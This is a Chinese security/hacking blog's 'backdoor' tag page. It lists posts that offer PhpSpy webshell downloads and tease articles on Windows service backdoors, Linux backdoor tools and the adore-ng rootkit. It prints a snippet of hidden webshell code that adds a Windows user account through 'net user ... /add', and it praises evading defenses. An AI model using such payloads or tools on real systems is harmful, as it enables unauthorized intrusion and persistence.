后门

PhpSpy2008低调上市

angel说做人要低调点的。

更多请关注本www.4ngel.net

phpspy_2008.rar (18.89 KB, 下载次数:489, 上传时间:2008-01-07 21:03)

关键词: 后门 , phpspy , 工具

PhpSpy2008

先看下angel忽悠我的部分源码

  1. makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');  
  2. makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');  
  3. </script> 

太牛X了,还好我先看了下代码,呼呼。估计是跟黑锅学的,这Y的不学好。前几天测试的那个版本还有部分问题,这个版本,基本上是已经很完美了,在MYSQL管理方面是大大的强。

AJAX也比较强,今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的,在AJAX面前就什么都不是了。

关键词: 后门 , phpspy

浅析Windows2000/XP服务与后门技术

一> 序言
    windows下的服务程序都遵循服务控制管理器(SCM)的接口标准,它们会在登录系统时自动运行,甚至在没有用户登录系统的情况下也会正常执行,类似与UNIX系统中的守护进程(daemon)。它们大多是控制台程序,不过也有少数的GUI程序。本文所涉及到的服务程序仅限于Windows2000/XP系统中的一般服务程序,不包含Windows9X。本文相关服务级后门程序和代码可以到我们的主页FZ5FZ下载。

二> Windows服务简介
    服务控制管理器拥有一个在注册表中记录的数据库,包含了所有已安装的服务程序和设备驱动服务程序的相关信息。它允许系统管理员为每个服务自定义安全要求和控制访问权限。Windows服务包括四大部分:服务控制管理器(Service Control Manager),服务控制程序(Service Control Program),服务程序(Service Program)和服务配置程序(Service Configuration Program)。

» 阅读全文

关键词: 服务 , 系统安全 , 后门 , windows , 系统

phpSPY 2006 最终修改版


7J 刚发过来的

加了目录加包,MYSQL和FTP的暴力破解,MYSQL上传下载,ADODB等,更多的东东大家自己去体会吧!
shell.php (91.27 KB, 下载次数:706, 上传时间:2007-03-29 10:32)

关键词: 后门 , phpspy , 工具

Linux下的后门和日志工具

 攻入linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具

  1、从这里延伸:后门和连接工具

  (1)Httptunnel

  Tunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是 在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。说得简单点,就是说在防火墙两边都设立一个转换程序,将原来需要发送或接受的数据包封装成 HTTP请求的格式骗过防火墙,所以它不需要别的代理服务器而直接穿透防火墙。

» 阅读全文

关键词: 后门 , 工具 , 安全 , linux

linux后门系列之adore-ng

前言:
kernel 2.6已经大步走入linux的世界,写后门的和用后门的也得跟上潮流。

简写约定:
fc:fedora core
rh:red hat
rhel4:red hat enterprise linux 4
sk:suckit
adore:adore-ng
rk:rootkit
lkm:loadable kernel modules

什么是adore-ng?

» 阅读全文

关键词: 后门 , linux